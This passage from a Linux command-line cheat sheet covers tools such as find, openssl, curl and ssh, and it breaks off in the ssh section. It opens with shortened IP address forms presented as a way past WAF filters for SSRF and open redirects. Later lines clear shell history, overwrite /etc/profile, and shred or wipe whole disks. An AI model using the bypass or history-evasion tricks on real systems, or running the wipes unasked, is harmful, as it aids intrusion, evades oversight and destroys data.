Shortening IP Address (by [0xInfection](https://twitter.com/0xInfection)) IP addresses can be shortened by dropping the zeroes: ``` http://1.0.0.1 โ†’ http://1.1 http://127.0.0.1 โ†’ http://127.1 http://192.168.0.1 โ†’ http://192.168.1 http://0xC0A80001 or http://3232235521 โ†’ 192.168.0.1 http://192.168.257 โ†’ 192.168.1.1 http://192.168.516 โ†’ 192.168.2.4 ``` > This bypasses WAF filters for SSRF, open-redirect, etc where any IP as input gets blacklisted. For more information please see [How to Obscure Any URL](http://www.pc-help.org/obscure.htm) and [Magic IP Address Shortcuts](https://stuff-things.net/2014/09/25/magic-ip-address-shortcuts/). #### One-liners &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### Table of Contents * [terminal](#tool-terminal) * [busybox](#tool-busybox) * [mount](#tool-mount) * [fuser](#tool-fuser) * [lsof](#tool-lsof) * [ps](#tool-ps) * [top](#tool-top) * [vmstat](#tool-vmstat) * [iostat](#tool-iostat) * [strace](#tool-strace) * [kill](#tool-kill) * [find](#tool-find) * [diff](#tool-diff) * [vimdiff](#tool-vimdiff) * [tail](#tool-tail) * [cpulimit](#tool-cpulimit) * [pwdx](#tool-pwdx) * [tr](#tool-tr) * [chmod](#tool-chmod) * [who](#tool-who) * [last](#tool-last) * [screen](#tool-screen) * [script](#tool-script) * [du](#tool-du) * [inotifywait](#tool-inotifywait) * [openssl](#tool-openssl) * [secure-delete](#tool-secure-delete) * [dd](#tool-dd) * [gpg](#tool-gpg) * [system-other](#tool-system-other) * [curl](#tool-curl) * [httpie](#tool-httpie) * [ssh](#tool-ssh) * [linux-dev](#tool-linux-dev) * [tcpdump](#tool-tcpdump) * [tcpick](#tool-tcpick) * [ngrep](#tool-ngrep) * [hping3](#tool-hping3) * [nmap](#tool-nmap) * [netcat](#tool-netcat) * [socat](#tool-socat) * [p0f](#tool-p0f) * [gnutls-cli](#tool-gnutls-cli) * [netstat](#tool-netstat) * [rsync](#tool-rsync) * [host](#tool-host) * [dig](#tool-dig) * [certbot](#tool-certbot) * [network-other](#tool-network-other) * [git](#tool-git) * [awk](#tool-awk) * [sed](#tool-sed) * [grep](#tool-grep) * [perl](#tool-perl) ##### Tool: [terminal](https://en.wikipedia.org/wiki/Linux_console) ###### Reload shell without exit ```bash exec $SHELL -l ``` ###### Close shell keeping all subprocess running ```bash disown -a && exit ``` ###### Exit without saving shell history ```bash kill -9 $$ unset HISTFILE && exit ``` ###### Perform a branching conditional ```bash true && echo success false || echo failed ``` ###### Pipe stdout and stderr to separate commands ```bash some_command > >(/bin/cmd_for_stdout) 2> >(/bin/cmd_for_stderr) ``` ###### Redirect stdout and stderr each to separate files and print both to the screen ```bash (some_command 2>&1 1>&3 | tee errorlog ) 3>&1 1>&2 | tee stdoutlog ``` ###### List of commands you use most often ```bash history | \ awk '{CMD[$2]++;count++;}END { for (a in CMD)print CMD[a] " " CMD[a]/count*100 "% " a;}' | \ grep -v "./" | \ column -c3 -s " " -t | \ sort -nr | nl | head -n 20 ``` ###### Sterilize bash history ```bash function sterile() { history | awk '$2 != "history" { $1=""; print $0 }' | egrep -vi "\ curl\b+.*(-E|--cert)\b+.*\b*|\ curl\b+.*--pass\b+.*\b*|\ curl\b+.*(-U|--proxy-user).*:.*\b*|\ curl\b+.*(-u|--user).*:.*\b* .*(-H|--header).*(token|auth.*)\b+.*|\ wget\b+.*--.*password\b+.*\b*|\ http.?://.+:.+@.*\ " > $HOME/histbuff; history -r $HOME/histbuff; } export PROMPT_COMMAND="sterile" ``` > Look also: [A naive utility to censor credentials in command history](https://github.com/lbonanomi/go/blob/master/revisionist.go). ###### Quickly backup a file ```bash cp filename{,.orig} ``` ###### Empty a file (truncate to 0 size) ```bash >filename ``` ###### Delete all files in a folder that don't match a certain file extension ```bash rm !(*.foo|*.bar|*.baz) ``` ###### Pass multi-line string to a file ```bash # cat >filename ... - overwrite the file # cat >>filename ... - append to a file cat > filename << __EOF__ data data data __EOF__ ``` ###### Edit a file on a remote host using vim ```bash vim scp://user@host//etc/fstab ``` ###### Create a directory and change into it at the same time ```bash mkd() { mkdir -p "$@" && cd "$@"; } ``` ###### Convert uppercase files to lowercase files ```bash rename 'y/A-Z/a-z/' * ``` ###### Print a row of characters across the terminal ```bash printf "%`tput cols`s" | tr ' ' '#' ``` ###### Show shell history without line numbers ```bash history | cut -c 8- fc -l -n 1 | sed 's/^\s*//' ``` ###### Run command(s) after exit session ```bash cat > /etc/profile << __EOF__ _after_logout() { username=$(whoami) for _pid in $(ps afx | grep sshd | grep "$username" | awk '{print $1}') ; do kill -9 $_pid done } trap _after_logout EXIT __EOF__ ``` ###### Generate a sequence of numbers ```bash for ((i=1; i<=10; i+=2)) ; do echo $i ; done # alternative: seq 1 2 10 for ((i=5; i<=10; ++i)) ; do printf '%02d\n' $i ; done # alternative: seq -w 5 10 for i in {1..10} ; do echo $i ; done ``` ###### Simple Bash filewatching ```bash unset MAIL; export MAILCHECK=1; export MAILPATH='$FILE_TO_WATCH?$MESSAGE' ``` --- ##### Tool: [busybox](https://www.busybox.net/) ###### Static HTTP web server ```bash busybox httpd -p $PORT -h $HOME [-c httpd.conf] ``` ___ ##### Tool: [mount](https://en.wikipedia.org/wiki/Mount_(Unix)) ###### Mount a temporary ram partition ```bash mount -t tmpfs tmpfs /mnt -o size=64M ``` * `-t` - filesystem type * `-o` - mount options ###### Remount a filesystem as read/write ```bash mount -o remount,rw / ``` ___ ##### Tool: [fuser](https://en.wikipedia.org/wiki/Fuser_(Unix)) ###### Show which processes use the files/directories ```bash fuser /var/log/daemon.log fuser -v /home/supervisor ``` ###### Kills a process that is locking a file ```bash fuser -ki filename ``` * `-i` - interactive option ###### Kills a process that is locking a file with specific signal ```bash fuser -k -HUP filename ``` * `--list-signals` - list available signal names ###### Show what PID is listening on specific port ```bash fuser -v 53/udp ``` ###### Show all processes using the named filesystems or block device ```bash fuser -mv /var/www ``` ___ ##### Tool: [lsof](https://en.wikipedia.org/wiki/Lsof) ###### Show process that use internet connection at the moment ```bash lsof -P -i -n ``` ###### Show process that use specific port number ```bash lsof -i tcp:443 ``` ###### Lists all listening ports together with the PID of the associated process ```bash lsof -Pan -i tcp -i udp ``` ###### List all open ports and their owning executables ```bash lsof -i -P | grep -i "listen" ``` ###### Show all open ports ```bash lsof -Pnl -i ``` ###### Show open ports (LISTEN) ```bash lsof -Pni4 | grep LISTEN | column -t ``` ###### List all files opened by a particular command ```bash lsof -c "process" ``` ###### View user activity per directory ```bash lsof -u username -a +D /etc ``` ###### Show 10 largest open files ```bash lsof / | \ awk '{ if($7 > 1048576) print $7/1048576 "MB" " " $9 " " $1 }' | \ sort -n -u | tail | column -t ``` ###### Show current working directory of a process ```bash lsof -p <PID> | grep cwd ``` ___ ##### Tool: [ps](https://en.wikipedia.org/wiki/Ps_(Unix)) ###### Show a 4-way scrollable process tree with full details ```bash ps awwfux | less -S ``` ###### Processes per user counter ```bash ps hax -o user | sort | uniq -c | sort -r ``` ###### Show all processes by name with main header ```bash ps -lfC nginx ``` ___ ##### Tool: [find](https://en.wikipedia.org/wiki/Find_(Unix)) ###### Find files that have been modified on your system in the past 60 minutes ```bash find / -mmin 60 -type f ``` ###### Find all files larger than 20M ```bash find / -type f -size +20M ``` ###### Find duplicate files (based on MD5 hash) ```bash find -type f -exec md5sum '{}' ';' | sort | uniq --all-repeated=separate -w 33 ``` ###### Change permission only for files ```bash cd /var/www/site && find . -type f -exec chmod 766 {} \; cd /var/www/site && find . -type f -exec chmod 664 {} + ``` ###### Change permission only for directories ```bash cd /var/www/site && find . -type d -exec chmod g+x {} \; cd /var/www/site && find . -type d -exec chmod g+rwx {} + ``` ###### Find files and directories for specific user/group ```bash # User: find . -user <username> -print find /etc -type f -user <username> -name "*.conf" # Group: find /opt -group <group> find /etc -type f -group <group> -iname "*.conf" ``` ###### Find files and directories for all without specific user/group ```bash # User: find . \! -user <username> -print # Group: find . \! -group <group> ``` ###### Looking for files/directories that only have certain permission ```bash # User find . -user <username> -perm -u+rw # -rw-r--r-- find /home -user $(whoami) -perm 777 # -rwxrwxrwx # Group: find /home -type d -group <group> -perm 755 # -rwxr-xr-x ``` ###### Delete older files than 60 days ```bash find . -type f -mtime +60 -delete ``` ###### Recursively remove all empty sub-directories from a directory ```bash find . -depth -type d -empty -exec rmdir {} \; ``` ###### How to find all hard links to a file ```bash find </path/to/dir> -xdev -samefile filename ``` ###### Recursively find the latest modified files ```bash find . -type f -exec stat --format '%Y :%y %n' "{}" \; | sort -nr | cut -d: -f2- | head ``` ###### Recursively find/replace of a string with sed ```bash find . -not -path '*/\.git*' -type f -print0 | xargs -0 sed -i 's/foo/bar/g' ``` ###### Recursively find/replace of a string in directories and file names ```bash find . -depth -name '*test*' -execdir bash -c 'mv -v "$1" "${1//foo/bar}"' _ {} \; ``` ###### Recursively find suid executables ```bash find / \( -perm -4000 -o -perm -2000 \) -type f -exec ls -la {} \; ``` ___ ##### Tool: [top](https://en.wikipedia.org/wiki/Top_(software)) ###### Use top to monitor only all processes with the specific string ```bash top -p $(pgrep -d , <str>) ``` * `<str>` - process containing string (eg. nginx, worker) ___ ##### Tool: [vmstat](https://en.wikipedia.org/wiki/Vmstat) ###### Show current system utilization (fields in kilobytes) ```bash vmstat 2 20 -t -w ``` * `2` - number of times with a defined time interval (delay) * `20` - each execution of the command (count) * `-t` - show timestamp * `-w` - wide output * `-S M` - output of the fields in megabytes instead of kilobytes ###### Show current system utilization will get refreshed every 5 seconds ```bash vmstat 5 -w ``` ###### Display report a summary of disk operations ```bash vmstat -D ``` ###### Display report of event counters and memory stats ```bash vmstat -s ``` ###### Display report about kernel objects stored in slab layer cache ```bash vmstat -m ``` ##### Tool: [iostat](https://en.wikipedia.org/wiki/Iostat) ###### Show information about the CPU usage, and I/O statistics about all the partitions ```bash iostat 2 10 -t -m ``` * `2` - number of times with a defined time interval (delay) * `10` - each execution of the command (count) * `-t` - show timestamp * `-m` - fields in megabytes (`-k` - in kilobytes, default) ###### Show information only about the CPU utilization ```bash iostat 2 10 -t -m -c ``` ###### Show information only about the disk utilization ```bash iostat 2 10 -t -m -d ``` ###### Show information only about the LVM utilization ```bash iostat -N ``` ___ ##### Tool: [strace](https://en.wikipedia.org/wiki/Strace) ###### Track with child processes ```bash # 1) strace -f -p $(pidof glusterfsd) # 2) strace -f $(pidof php-fpm | sed 's/\([0-9]*\)/\-p \1/g') ``` ###### Track process with 30 seconds limit ```bash timeout 30 strace $(< /var/run/zabbix/zabbix_agentd.pid) ``` ###### Track processes and redirect output to a file ```bash ps auxw | grep '[a]pache' | awk '{print " -p " $2}' | \ xargs strace -o /tmp/strace-apache-proc.out ``` ###### Track with print time spent in each syscall and limit length of print strings ```bash ps auxw | grep '[i]init_policy' | awk '{print " -p " $2}' | \ xargs strace -f -e trace=network -T -s 10000 ``` ###### Track the open request of a network port ```bash strace -f -e trace=bind nc -l 80 ``` ###### Track the open request of a network port (show TCP/UDP) ```bash strace -f -e trace=network nc -lu 80 ``` ___ ##### Tool: [kill](https://en.wikipedia.org/wiki/Kill_(command)) ###### Kill a process running on port ```bash kill -9 $(lsof -i :<port> | awk '{l=$2} END {print l}') ``` ___ ##### Tool: [diff](https://en.wikipedia.org/wiki/Diff) ###### Compare two directory trees ```bash diff <(cd directory1 && find | sort) <(cd directory2 && find | sort) ``` ###### Compare output of two commands ```bash diff <(cat /etc/passwd) <(cut -f2 /etc/passwd) ``` ___ ##### Tool: [vimdiff](http://vimdoc.sourceforge.net/htmldoc/diff.html) ###### Highlight the exact differences, based on characters and words ```bash vimdiff file1 file2 ``` ###### Compare two JSON files ```bash vimdiff <(jq -S . A.json) <(jq -S . B.json) ``` ###### Compare Hex dump ```bash d(){ vimdiff <(f $1) <(f $2);};f(){ hexdump -C $1|cut -d' ' -f3-|tr -s ' ';}; d ~/bin1 ~/bin2 ``` ###### diffchar Save [diffchar](https://raw.githubusercontent.com/vim-scripts/diffchar.vim/master/plugin/diffchar.vim) @ `~/.vim/plugins` Click `F7` to switch between diff modes Usefull `vimdiff` commands: * `qa` to exit all windows * `:vertical resize 70` to resize window * set window width `Ctrl+W [N columns]+(Shift+)<\>` ___ ##### Tool: [tail](https://en.wikipedia.org/wiki/Tail_(Unix)) ###### Annotate tail -f with timestamps ```bash tail -f file | while read ; do echo "$(date +%T.%N) $REPLY" ; done ``` ###### Analyse an Apache access log for the most common IP addresses ```bash tail -10000 access_log | awk '{print $1}' | sort | uniq -c | sort -n | tail ``` ###### Analyse web server log and show only 5xx http codes ```bash tail -n 100 -f /path/to/logfile | grep "HTTP/[1-2].[0-1]\" [5]" ``` ___ ##### Tool: [tar](https://en.wikipedia.org/wiki/Tar_(computing)) ###### System backup with exclude specific directories ```bash cd / tar -czvpf /mnt/system$(date +%d%m%Y%s).tgz --directory=/ \ --exclude=proc/* --exclude=sys/* --exclude=dev/* --exclude=mnt/* . ``` ###### System backup with exclude specific directories (pigz) ```bash cd / tar cvpf /backup/snapshot-$(date +%d%m%Y%s).tgz --directory=/ \ --exclude=proc/* --exclude=sys/* --exclude=dev/* \ --exclude=mnt/* --exclude=tmp/* --use-compress-program=pigz . ``` ___ ##### Tool: [dump](https://en.wikipedia.org/wiki/Dump_(program)) ###### System backup to file ```bash dump -y -u -f /backup/system$(date +%d%m%Y%s).lzo / ``` ###### Restore system from lzo file ```bash cd / restore -rf /backup/system$(date +%d%m%Y%s).lzo ``` ___ ##### Tool: [cpulimit](http://cpulimit.sourceforge.net/) ###### Limit the cpu usage of a process ```bash cpulimit -p pid -l 50 ``` ___ ##### Tool: [pwdx](https://www.cyberciti.biz/faq/unix-linux-pwdx-command-examples-usage-syntax/) ###### Show current working directory of a process ```bash pwdx <pid> ``` ___ ##### Tool: [taskset](https://www.cyberciti.biz/faq/taskset-cpu-affinity-command/) ###### Start a command on only one CPU core ```bash taskset -c 0 <command> ``` ___ ##### Tool: [tr](https://en.wikipedia.org/wiki/Tr_(Unix)) ###### Show directories in the PATH, one per line ```bash tr : '\n' <<<$PATH ``` ___ ##### Tool: [chmod](https://en.wikipedia.org/wiki/Chmod) ###### Remove executable bit from all files in the current directory ```bash chmod -R -x+X * ``` ###### Restore permission for /bin/chmod ```bash # 1: cp /bin/ls chmod.01 cp /bin/chmod chmod.01 ./chmod.01 700 file # 2: /bin/busybox chmod 0700 /bin/chmod # 3: setfacl --set u::rwx,g::---,o::--- /bin/chmod ``` ___ ##### Tool: [who](https://en.wikipedia.org/wiki/Who_(Unix)) ###### Find last reboot time ```bash who -b ``` ###### Detect a user sudo-su'd into the current shell ```bash [[ $(who -m | awk '{ print $1 }') == $(whoami) ]] || echo "You are su-ed to $(whoami)" ``` ___ ##### Tool: [last](https://www.howtoforge.com/linux-last-command/) ###### Was the last reboot a panic? ```bash (last -x -f $(ls -1t /var/log/wtmp* | head -2 | tail -1); last -x -f /var/log/wtmp) | \ grep -A1 reboot | head -2 | grep -q shutdown && echo "Expected reboot" || echo "Panic reboot" ``` ___ ##### Tool: [screen](https://en.wikipedia.org/wiki/GNU_Screen) ###### Start screen in detached mode ```bash screen -d -m <command> ``` ###### Attach to an existing screen session ```bash screen -r -d <pid> ``` ___ ##### Tool: [script](https://en.wikipedia.org/wiki/Script_(Unix)) ###### Record and replay terminal session ```bash ### Record session # 1) script -t 2>~/session.time -a ~/session.log # 2) script --timing=session.time session.log ### Replay session scriptreplay --timing=session.time session.log ``` ___ ##### Tool: [du](https://en.wikipedia.org/wiki/GNU_Screen) ###### Show 20 biggest directories with 'K M G' ```bash du | \ sort -r -n | \ awk '{split("K M G",v); s=1; while($1>1024){$1/=1024; s++} print int($1)" "v[s]"\t"$2}' | \ head -n 20 ``` ___ ##### Tool: [inotifywait](https://en.wikipedia.org/wiki/GNU_Screen) ###### Init tool everytime a file in a directory is modified ```bash while true ; do inotifywait -r -e MODIFY dir/ && ls dir/ ; done; ``` ___ ##### Tool: [openssl](https://www.openssl.org/) ###### Testing connection to the remote host ```bash echo | openssl s_client -connect google.com:443 -showcerts ``` ###### Testing connection to the remote host (debug mode) ```bash echo | openssl s_client -connect google.com:443 -showcerts -tlsextdebug -status ``` ###### Testing connection to the remote host (with SNI support) ```bash echo | openssl s_client -showcerts -servername google.com -connect google.com:443 ``` ###### Testing connection to the remote host with specific ssl version ```bash openssl s_client -tls1_2 -connect google.com:443 ``` ###### Testing connection to the remote host with specific ssl cipher ```bash openssl s_client -cipher 'AES128-SHA' -connect google.com:443 ``` ###### Verify 0-RTT ```bash _host="example.com" cat > req.in << __EOF__ HEAD / HTTP/1.1 Host: $_host Connection: close __EOF__ openssl s_client -connect ${_host}:443 -tls1_3 -sess_out session.pem -ign_eof < req.in openssl s_client -connect ${_host}:443 -tls1_3 -sess_in session.pem -early_data req.in ``` ###### Generate private key without passphrase ```bash # _len: 2048, 4096 ( _fd="private.key" ; _len="2048" ; \ openssl genrsa -out ${_fd} ${_len} ) ``` ###### Generate private key with passphrase ```bash # _ciph: des3, aes128, aes256 # _len: 2048, 4096 ( _ciph="aes128" ; _fd="private.key" ; _len="2048" ; \ openssl genrsa -${_ciph} -out ${_fd} ${_len} ) ``` ###### Remove passphrase from private key ```bash ( _fd="private.key" ; _fd_unp="private_unp.key" ; \ openssl rsa -in ${_fd} -out ${_fd_unp} ) ``` ###### Encrypt existing private key with a passphrase ```bash # _ciph: des3, aes128, aes256 ( _ciph="aes128" ; _fd="private.key" ; _fd_pass="private_pass.key" ; \ openssl rsa -${_ciph} -in ${_fd} -out ${_fd_pass} ``` ###### Check private key ```bash ( _fd="private.key" ; \ openssl rsa -check -in ${_fd} ) ``` ###### Get public key from private key ```bash ( _fd="private.key" ; _fd_pub="public.key" ; \ openssl rsa -pubout -in ${_fd} -out ${_fd_pub} ) ``` ###### Generate private key and CSR ```bash ( _fd="private.key" ; _fd_csr="request.csr" ; _len="2048" ; \ openssl req -out ${_fd_csr} -new -newkey rsa:${_len} -nodes -keyout ${_fd} ) ``` ###### Generate CSR ```bash ( _fd="private.key" ; _fd_csr="request.csr" ; \ openssl req -out ${_fd_csr} -new -key ${_fd} ) ``` ###### Generate CSR (metadata from existing certificate) > Where `private.key` is the existing private key. As you can see you do not generate this CSR from your certificate (public key). Also you do not generate the "same" CSR, just a new one to request a new certificate. ```bash ( _fd="private.key" ; _fd_csr="request.csr" ; _fd_crt="cert.crt" ; \ openssl x509 -x509toreq -in ${_fd_crt} -out ${_fd_csr} -signkey ${_fd} ) ``` ###### Generate CSR with -config param ```bash ( _fd="private.key" ; _fd_csr="request.csr" ; \ openssl req -new -sha256 -key ${_fd} -out ${_fd_csr} \ -config <( cat << __EOF__ [req] default_bits = 2048 default_md = sha256 prompt = no distinguished_name = dn req_extensions = req_ext [ dn ] C = "<two-letter ISO abbreviation for your country>" ST = "<state or province where your organisation is legally located>" L = "<city where your organisation is legally located>" O = "<legal name of your organisation>" OU = "<section of the organisation>" CN = "<fully qualified domain name>" [ req_ext ] subjectAltName = @alt_names [ alt_names ] DNS.1 = <fully qualified domain name> DNS.2 = <next domain> DNS.3 = <next domain> __EOF__ )) ``` Other values in `[ dn ]`: ``` countryName = "DE" # C= stateOrProvinceName = "Hessen" # ST= localityName = "Keller" # L= postalCode = "424242" # L/postalcode= postalAddress = "Keller" # L/postaladdress= streetAddress = "Crater 1621" # L/street= organizationName = "apfelboymschule" # O= organizationalUnitName = "IT Department" # OU= commonName = "example.com" # CN= emailAddress = "[email protected]" # CN/emailAddress= ``` Example of `oids` (you'll probably also have to make OpenSSL know about the new fields required for EV by adding the following under `[new_oids]`): ``` [req] ... oid_section = new_oids [ new_oids ] postalCode = 2.5.4.17 streetAddress = 2.5.4.9 ``` For more information please look at these great explanations: - [RFC 5280](https://tools.ietf.org/html/rfc5280) - [How to create multidomain certificates using config files](https://apfelboymchen.net/gnu/notes/openssl%20multidomain%20with%20config%20files.html) - [Generate a multi domains certificate using config files](https://gist.github.com/romainnorberg/464758a6620228b977212a3cf20c3e08) - [Your OpenSSL CSR command is out of date](https://expeditedsecurity.com/blog/openssl-csr-command/) - [OpenSSL example configuration file](https://www.tbs-certificats.com/openssl-dem-server-cert.cnf) ###### List available EC curves ```bash openssl ecparam -list_curves ``` ###### Print ECDSA private and public keys ```bash ( _fd="private.key" ; \ openssl ec -in ${_fd} -noout -text ) # For x25519 only extracting public key ( _fd="private.key" ; _fd_pub="public.key" ; \ openssl pkey -in ${_fd} -pubout -out ${_fd_pub} ) ``` ###### Generate ECDSA private key ```bash # _curve: prime256v1, secp521r1, secp384r1 ( _fd="private.key" ; _curve="prime256v1" ; \ openssl ecparam -out ${_fd} -name ${_curve} -genkey ) # _curve: X25519 ( _fd="private.key" ; _curve="x25519" ; \ openssl genpkey -algorithm ${_curve} -out ${_fd} ) ``` ###### Generate private key and CSR (ECC) ```bash # _curve: prime256v1, secp521r1, secp384r1 ( _fd="domain.com.key" ; _fd_csr="domain.com.csr" ; _curve="prime256v1" ; \ openssl ecparam -out ${_fd} -name ${_curve} -genkey ; \ openssl req -new -key ${_fd} -out ${_fd_csr} -sha256 ) ``` ###### Generate self-signed certificate ```bash # _len: 2048, 4096 ( _fd="domain.key" ; _fd_out="domain.crt" ; _len="2048" ; _days="365" ; \ openssl req -newkey rsa:${_len} -nodes \ -keyout ${_fd} -x509 -days ${_days} -out ${_fd_out} ) ``` ###### Generate self-signed certificate from existing private key ```bash # _len: 2048, 4096 ( _fd="domain.key" ; _fd_out="domain.crt" ; _days="365" ; \ openssl req -key ${_fd} -nodes \ -x509 -days ${_days} -out ${_fd_out} ) ``` ###### Generate self-signed certificate from existing private key and csr ```bash # _len: 2048, 4096 ( _fd="domain.key" ; _fd_csr="domain.csr" ; _fd_out="domain.crt" ; _days="365" ; \ openssl x509 -signkey ${_fd} -nodes \ -in ${_fd_csr} -req -days ${_days} -out ${_fd_out} ) ``` ###### Generate DH public parameters ```bash ( _dh_size="2048" ; \ openssl dhparam -out /etc/nginx/ssl/dhparam_${_dh_size}.pem "$_dh_size" ) ``` ###### Display DH public parameters ```bash openssl pkeyparam -in dhparam.pem -text ``` ###### Extract private key from pfx ```bash ( _fd_pfx="cert.pfx" ; _fd_key="key.pem" ; \ openssl pkcs12 -in ${_fd_pfx} -nocerts -nodes -out ${_fd_key} ) ``` ###### Extract private key and certs from pfx ```bash ( _fd_pfx="cert.pfx" ; _fd_pem="key_certs.pem" ; \ openssl pkcs12 -in ${_fd_pfx} -nodes -out ${_fd_pem} ) ``` ###### Extract certs from p7b ```bash # PKCS#7 file doesn't include private keys. ( _fd_p7b="cert.p7b" ; _fd_pem="cert.pem" ; \ openssl pkcs7 -inform DER -outform PEM -in ${_fd_p7b} -print_certs > ${_fd_pem}) # or: openssl pkcs7 -print_certs -in -in ${_fd_p7b} -out ${_fd_pem}) ``` ###### Convert DER to PEM ```bash ( _fd_der="cert.crt" ; _fd_pem="cert.pem" ; \ openssl x509 -in ${_fd_der} -inform der -outform pem -out ${_fd_pem} ) ``` ###### Convert PEM to DER ```bash ( _fd_der="cert.crt" ; _fd_pem="cert.pem" ; \ openssl x509 -in ${_fd_pem} -outform der -out ${_fd_der} ) ``` ###### Verification of the private key ```bash ( _fd="private.key" ; \ openssl rsa -noout -text -in ${_fd} ) ``` ###### Verification of the public key ```bash # 1) ( _fd="public.key" ; \ openssl pkey -noout -text -pubin -in ${_fd} ) # 2) ( _fd="private.key" ; \ openssl rsa -inform PEM -noout -in ${_fd} &> /dev/null ; \ if [ $? = 0 ] ; then echo -en "OK\n" ; fi ) ``` ###### Verification of the certificate ```bash ( _fd="certificate.crt" ; # format: pem, cer, crt \ openssl x509 -noout -text -in ${_fd} ) ``` ###### Verification of the CSR ```bash ( _fd_csr="request.csr" ; \ openssl req -text -noout -in ${_fd_csr} ) ``` ###### Check the private key and the certificate are match ```bash (openssl rsa -noout -modulus -in private.key | openssl md5 ; \ openssl x509 -noout -modulus -in certificate.crt | openssl md5) | uniq ``` ###### Check the private key and the CSR are match ```bash (openssl rsa -noout -modulus -in private.key | openssl md5 ; \ openssl req -noout -modulus -in request.csr | openssl md5) | uniq ``` ___ ##### Tool: [secure-delete](https://wiki.archlinux.org/index.php/Securely_wipe_disk) ###### Secure delete with shred ```bash shred -vfuz -n 10 file shred --verbose --random-source=/dev/urandom -n 1 /dev/sda ``` ###### Secure delete with scrub ```bash scrub -p dod /dev/sda scrub -p dod -r file ``` ###### Secure delete with badblocks ```bash badblocks -s -w -t random -v /dev/sda badblocks -c 10240 -s -w -t random -v /dev/sda ``` ###### Secure delete with secure-delete ```bash srm -vz /tmp/file sfill -vz /local sdmem -v swapoff /dev/sda5 && sswap -vz /dev/sda5 ``` ___ ##### Tool: [dd](https://en.wikipedia.org/wiki/Dd_(Unix)) ###### Show dd status every so often ```bash dd <dd_params> status=progress watch --interval 5 killall -USR1 dd ``` ###### Redirect output to a file with dd ```bash echo "string" | dd of=filename ``` ___ ##### Tool: [gpg](https://www.gnupg.org/) ###### Export public key ```bash gpg --export --armor "<username>" > username.pkey ``` * `--export` - export all keys from all keyrings or specific key * `-a|--armor` - create ASCII armored output ###### Encrypt file ```bash gpg -e -r "<username>" dump.sql ``` * `-e|--encrypt` - encrypt data * `-r|--recipient` - encrypt for specific <username> ###### Decrypt file ```bash gpg -o dump.sql -d dump.sql.gpg ``` * `-o|--output` - use as output file * `-d|--decrypt` - decrypt data (default) ###### Search recipient ```bash gpg --keyserver hkp://keyserver.ubuntu.com --search-keys "<username>" ``` * `--keyserver` - set specific key server * `--search-keys` - search for keys on a key server ###### List all of the packets in an encrypted file ```bash gpg --batch --list-packets archive.gpg gpg2 --batch --list-packets archive.gpg ``` ___ ##### Tool: [system-other](https://github.com/trimstray/the-book-of-secret-knowledge#tool-system-other) ###### Reboot system from init ```bash exec /sbin/init 6 ``` ###### Init system from single user mode ```bash exec /sbin/init ``` ###### Show current working directory of a process ```bash readlink -f /proc/<PID>/cwd ``` ###### Show actual pathname of the executed command ```bash readlink -f /proc/<PID>/exe ``` ##### Tool: [curl](https://curl.haxx.se) ```bash curl -Iks https://www.google.com ``` * `-I` - show response headers only * `-k` - insecure connection when using ssl * `-s` - silent mode (not display body) ```bash curl -Iks --location -X GET -A "x-agent" https://www.google.com ``` * `--location` - follow redirects * `-X` - set method * `-A` - set user-agent ```bash curl -Iks --location -X GET -A "x-agent" --proxy http://127.0.0.1:16379 https://www.google.com ``` * `--proxy [socks5://|http://]` - set proxy server ```bash curl -o file.pdf -C - https://example.com/Aiju2goo0Ja2.pdf ``` * `-o` - write output to file * `-C` - resume the transfer ###### Find your external IP address (external services) ```bash curl ipinfo.io curl ipinfo.io/ip curl icanhazip.com curl ifconfig.me/ip ; echo ``` ###### Repeat URL request ```bash # URL sequence substitution with a dummy query string: curl -ks https://example.com/?[1-20] # With shell 'for' loop: for i in {1..20} ; do curl -ks https://example.com/ ; done ``` ###### Check DNS and HTTP trace with headers for specific domains ```bash ### Set domains and external dns servers. _domain_list=(google.com) ; _dns_list=("8.8.8.8" "1.1.1.1") for _domain in "${_domain_list[@]}" ; do printf '=%.0s' {1..48} echo printf "[\\e[1;32m+\\e[m] resolve: %s\\n" "$_domain" for _dns in "${_dns_list[@]}" ; do # Resolve domain. host "${_domain}" "${_dns}" echo done for _proto in http https ; do printf "[\\e[1;32m+\\e[m] trace + headers: %s://%s\\n" "$_proto" "$_domain" # Get trace and http headers. curl -Iks -A "x-agent" --location "${_proto}://${_domain}" echo done done unset _domain_list _dns_list ``` ___ ##### Tool: [httpie](https://httpie.org/) ```bash http -p Hh https://www.google.com ``` * `-p` - print request and response headers * `H` - request headers * `B` - request body * `h` - response headers * `b` - response body ```bash http -p Hh https://www.google.com --follow --verify no ``` * `-F, --follow` - follow redirects * `--verify no` - skip SSL verification ```bash http -p Hh https://www.google.com --follow --verify no \ --proxy http:http://127.0.0.1:16379 ``` * `--proxy [http:]` - set proxy server ##### Tool: [ssh](https://www.openssh.com/) ###### Escape Sequence ``` # Supported escape sequences: ~. - terminate connection (and any multiplexed sessions) ~B - send a BREAK to the remote system ~C - open a command line ~R - Request rekey (SSH protocol 2 only) ~^Z - suspend ssh ~# - list forwarded connections ~& - background ssh (when waiting for connections to terminate) ~? - this message ~~ - send the escape character by typing it twice ``` ###### Compare a remote file with a local file ```bash ssh user@host cat /path/to/remotefile | diff /path/to/localfile - ``` ###### SSH connection through host in the middle ```bash ssh -t reachable_host ssh unreachable_host ``` ###### Run command over SSH on remote host ```bash cat > cmd.txt << __EOF__ cat /etc/hosts __EOF__ ssh host -l user $(<cmd.txt) ``` ###### Get public key from private key ```bash ssh-keygen -y -f ~/.ssh/id_rsa ``` ###### Get all fingerprints ```bash ssh-keygen -l -f .ssh/known_hosts ``` ###### SSH authentication with user password ```bash ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no user@remote_host ``` ###### SSH authentication with publickey ```bash ssh -o PreferredAuthentications=publickey -o PubkeyAuthentication=yes -i id_rsa user@remote_host ``` ###### Simple recording SSH session ```bash function _ssh_sesslog() { _sesdir="<path/to/session/logs>" mkdir -p "${_sesdir}" && \ ssh $@ 2>&1 | tee -a "${_sesdir}/$(date +%Y%m%d).log" } # Alias: alias ssh='_ssh_sesslog' ``` ###### Using Keychain for SSH logins ```bash ### Delete all of ssh-agent's keys. function _scl() { /usr/bin/keychain --clear } ### Add key to keychain. function _scg() { /usr/bin/keychain /path/to/private-key source "$HOME/.keychain/$HOSTNAME-sh" } ``` ###### SSH login without processing any login scripts ```bash ssh -tt user@host bash ``` ###### SSH local port forwarding Example 1: ```bash # Forwarding our local 2250 port to nmap.org:443 from localhost through localhost host1> ssh -L 2250:nmap.org:443 localhost # Connect to the service: host1> curl -Iks --location -X GET https://localhost:2250 ``` Example 